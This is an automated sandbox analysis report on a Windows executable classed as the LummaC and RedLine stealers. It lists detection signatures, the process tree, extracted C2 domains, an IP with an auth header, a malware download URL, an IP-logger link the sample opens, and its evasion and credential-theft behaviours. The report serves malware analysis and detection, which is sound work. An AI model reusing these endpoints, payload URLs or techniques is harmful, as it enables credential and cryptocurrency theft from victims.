Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dlcdkJcbbV.exe

Overview

General Information

Sample name:dlcdkJcbbV.exe
renamed because original name is a hash value
Original sample name:9adc621f718c8e283e2b946acf914322.exe
Analysis ID:1468951
MD5:9adc621f718c8e283e2b946acf914322
SHA1:13f01086a0878cd540112ddcef23133a117dc4c0
SHA256:2ff2f5480438c7d7648625cc56c8982880d678f565267d83d48dde4043c059d7
Tags:32exetrojan
Infos:

Detection

LummaC, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
Yara detected RedLine Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • dlcdkJcbbV.exe (PID: 6864 cmdline: "C:\Users\user\Desktop\dlcdkJcbbV.exe" MD5: 9ADC621F718C8E283E2B946ACF914322)
    • chrome.exe (PID: 6316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1lLub MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 2972 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2012,i,18138774805082086482,6084898120708569672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 8100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2012,i,18138774805082086482,6084898120708569672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • 7.exe (PID: 7936 cmdline: "C:\Users\user\AppData\Local\Temp\7.exe" MD5: F308BE1162C86C3D72AD06C4C85A67D4)
      • BitLockerToGo.exe (PID: 8060 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: LummaC

{"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "willingyhollowsk.shop"], "Build id": "fuOLMb--palpatine"}

Threatname: RedLine

{"C2 url": ["185.215.113.67:40960"], "Bot Id": "newbuild", "Authorization Header": "e4460bd99c868950f0858f084a0e3d16"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
dlcdkJcbbV.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000008.00000002.2708226918.000000C0008D8000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
          • 0x0:$x1: 4d5a9000030000000
          00000000.00000000.2304090109.00000000008D2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000009.00000003.2764259056.0000000003494000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000009.00000003.2760836658.0000000003494000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Process Memory Space: dlcdkJcbbV.exe PID: 6864JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 4 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.dlcdkJcbbV.exe.8d0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:07/08/24-10:09:54.549288
                    SID:2054183
                    Source Port:49741
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:53.035633
                    SID:2054183
                    Source Port:49740
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:48.653781
                    SID:2054183
                    Source Port:49736
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:48.632971
                    SID:2054182
                    Source Port:63872
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:48.621940
                    SID:2053384
                    Source Port:58902
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:56.210269
                    SID:2054183
                    Source Port:49742
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:58.735485
                    SID:2054183
                    Source Port:49745
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:15.749307
                    SID:2046056
                    Source Port:40960
                    Destination Port:49710
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:10.202750
                    SID:2046045
                    Source Port:49710
                    Destination Port:40960
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:32.567923
                    SID:2043231
                    Source Port:49710
                    Destination Port:40960
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:51.932584
                    SID:2054183
                    Source Port:49739
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:50.780898
                    SID:2054183
                    Source Port:49738
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:49.557986
                    SID:2054183
                    Source Port:49737
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/08/24-10:09:10.446155
                    SID:2043234
                    Source Port:40960
                    Destination Port:49710
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://potterryisiw.shop/apiMAvira URL Cloud: Label: malware
                    Source: https://potterryisiw.shop/apiKAvira URL Cloud: Label: malware
                    Source: https://potterryisiw.shop/apiDAvira URL Cloud: Label: malware
                    Source: ellaboratepwsz.xyzAvira URL Cloud: Label: malware
                    Source: swellfrrgwwos.xyzAvira URL Cloud: Label: malware
                    Source: https://iplogger.co/favicon.icoAvira URL Cloud: Label: malware
                    Source: https://potterryisiw.shop/apirAvira URL Cloud: Label: malware
                    Source: https://potterryisiw.shop:443/apiAvira URL Cloud: Label: malware
                    Source: https://potterryisiw.shop/apieAvira URL Cloud: Label: malware
                    Source: foodypannyjsud.shopAvira URL Cloud: Label: malware
                    Source: https://potterryisiw.shop/apiiAvira URL Cloud: Label: malware
                    Source: https://iplogger.co/https://iplogger.co/1lLubiplogger.co/1lLubAvira URL Cloud: Label: malware
                    Source: https://potterryisiw.shop/apibAvira URL Cloud: Label: malware
                    Source: https://potterryisiw.shop/api2Avira URL Cloud: Label: malware
                    Source: https://potterryisiw.shop/api1Avira URL Cloud: Label: malware
                    Source: https://bitbucket.org/tanosx/clockbrix/downloads/Chrome_Password_Remover.exeAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: dlcdkJcbbV.exeMalware Configuration Extractor: RedLine {"C2 url": ["185.215.113.67:40960"], "Bot Id": "newbuild", "Authorization Header": "e4460bd99c868950f0858f084a0e3d16"}
                    Source: 8.2.7.exe.c0005c4000.3.unpackMalware Configuration Extractor: LummaC {"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "willingyhollowsk.shop"], "Build id": "fuOLMb--palpatine"}
                    Multi AV Scanner detection for domain / URL
                    Source: potterryisiw.shopVirustotal: Detection: 17%Perma Link
                    Source: willingyhollowsk.shopVirustotal: Detection: 13%Perma Link
                    Source: ellaboratepwsz.xyzVirustotal: Detection: 15%Perma Link
                    Source: swellfrrgwwos.xyzVirustotal: Detection: 17%Perma Link
                    Source: https://potterryisiw.shop:443/apiVirustotal: Detection: 19%Perma Link
                    Source: foodypannyjsud.shopVirustotal: Detection: 19%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7.exeReversingLabs: Detection: 83%
                    Multi AV Scanner detection for submitted file
                    Source: dlcdkJcbbV.exeReversingLabs: Detection: 71%
                    Source: dlcdkJcbbV.exeVirustotal: Detection: 78%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: dlcdkJcbbV.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: pedestriankodwu.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: towerxxuytwi.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: ellaboratepwsz.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: penetratedpoopp.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: swellfrrgwwos.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: contintnetksows.shop
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: foodypannyjsud.shop
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: potterryisiw.shop
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: willingyhollowsk.shop
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: pedestriankodwu.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: towerxxuytwi.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: ellaboratepwsz.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: penetratedpoopp.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: swellfrrgwwos.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: contintnetksows.shop
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: foodypannyjsud.shop
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: potterryisiw.shop
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: willingyhollowsk.shop
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: pedestriankodwu.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: towerxxuytwi.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: ellaboratepwsz.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: penetratedpoopp.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: swellfrrgwwos.xyz
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: contintnetksows.shop
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: foodypannyjsud.shop
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: potterryisiw.shop
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: willingyhollowsk.shop
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString decryptor: fuOLMb--palpatine
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03217866 CryptUnprotectData,9_2_03217866
                    Source: https://iplogger.co/1lLubHTTP Parser: No favicon
                    Source: dlcdkJcbbV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 173.222.162.60:443 -> 192.168.2.12:49730 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.12:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.12:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.12:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.216.42.97:443 -> 192.168.2.12:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.12:49720 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.12:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.12:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.12:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49736 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49741 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.12:49746 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.12:49747 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.12:49752 version: TLS 1.2
                    Source: dlcdkJcbbV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: BitLockerToGo.pdb source: 7.exe, 00000008.00000002.2707050194.000000C000500000.00000004.00001000.00020000.00000000.sdmp, 7.exe, 00000008.00000002.2707050194.000000C00053A000.00000004.00001000.00020000.00000000.sdmp, 7.exe, 00000008.00000003.2701092302.000002256AD60000.00000004.00001000.00020000.00000000.sdmp, 7.exe, 00000008.00000002.2707693231.000000C0005C4000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: BitLockerToGo.pdbGCTL source: 7.exe, 00000008.00000002.2707050194.000000C000500000.00000004.00001000.00020000.00000000.sdmp, 7.exe, 00000008.00000002.2707050194.000000C00053A000.00000004.00001000.00020000.00000000.sdmp, 7.exe, 00000008.00000003.2701092302.000002256AD60000.00000004.00001000.00020000.00000000.sdmp, 7.exe, 00000008.00000002.2707693231.000000C0005C4000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 4x nop then jmp 0637B1E0h0_2_0637ACE8
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 4x nop then jmp 06378984h0_2_063786C0
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeCode function: 4x nop then jmp 063781CFh0_2_06377A70
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al9_2_03218349
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+10h]9_2_03218349
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], di9_2_03219284
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], di9_2_03219284
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+50h]9_2_03217293
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 077DEFCDh9_2_0323D130
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E4AA2089h9_2_032226F0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]9_2_032234B0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, dword ptr [esi]9_2_03239B15
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+00000574h]9_2_03227BF1
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]9_2_0323980B
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]9_2_032218B0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]9_2_03210F3E
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx9_2_0321BF50
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx9_2_03216F50
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push edi9_2_03216F50
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+00000888h]9_2_0321FE8B
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+00000888h]9_2_0321FE8B
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx9_2_03220E98
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]9_2_03220E98
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+30h]9_2_03208280
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [esi+ebx], 0000h9_2_0321C110
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], dx9_2_0321C110
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [eax], 0000h9_2_03216149
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ecx9_2_03216149
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], dl9_2_032271E0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, dx9_2_0322901A
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi+000001F0h], 587A4C12h9_2_0322901A
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then dec edi9_2_0323D710
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al9_2_03227773
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then or ebp, 08h9_2_0320161F
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx9_2_03239631
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then or ebp, 08h9_2_0320161F
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx9_2_032016B3
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]9_2_032036F0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]9_2_03233560
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax9_2_032215EF
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]9_2_032115F7
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+0Ch]9_2_0323B40A
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx9_2_03239445
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]9_2_03223480
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx9_2_032014E8
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx9_2_032394C0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]9_2_0320EA20
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, ebx9_2_03203A30
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+000000B4h]9_2_03227ABC
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add ebx, 02h9_2_03214A9B
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al9_2_0322991D
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]9_2_03209970
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]9_2_03209970
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then inc ebx9_2_032169A0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]9_2_032268D0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx9_2_03222EF0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]9_2_03222EF0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]9_2_03224ED7
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ecx], dl9_2_03208DA0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [0324424Ch]9_2_0321BDD3
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax9_2_03235DD9
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edx9_2_03221C30

                    Networking

                    barindex
                    Snort IDS alert for network traffic
